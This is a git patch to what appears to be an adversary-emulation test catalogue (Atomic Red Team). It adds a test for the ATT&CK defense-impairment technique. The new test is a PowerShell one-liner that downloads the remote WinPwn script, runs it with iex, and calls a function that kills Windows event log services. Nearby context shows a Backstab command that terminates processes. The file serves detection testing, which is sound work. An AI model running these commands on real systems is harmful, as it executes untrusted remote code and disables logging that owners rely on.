From 04edc6cdc1a1baeb5e69eaefdb26ed87d999fcbe Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Thu, 12 May 2022 17:54:22 -0500
Subject: [PATCH] Update T1562.001.yaml (#1956)

Kill the event log services for stealth via function of WinPwn

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1562.001/T1562.001.yaml | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 36b02dd0..e40b7c59 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -633,4 +633,13 @@ atomic_tests:
     command: '& $env:temp\Backstab64.exe -k -n #{process_name}'
     name: powershell
     elevation_required: true
-  
+- name: WinPwn - Kill the event log services for stealth
+  description: Kill the event log services for stealth via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      inv-phantom -consoleoutput -noninteractive  
+    name: powershell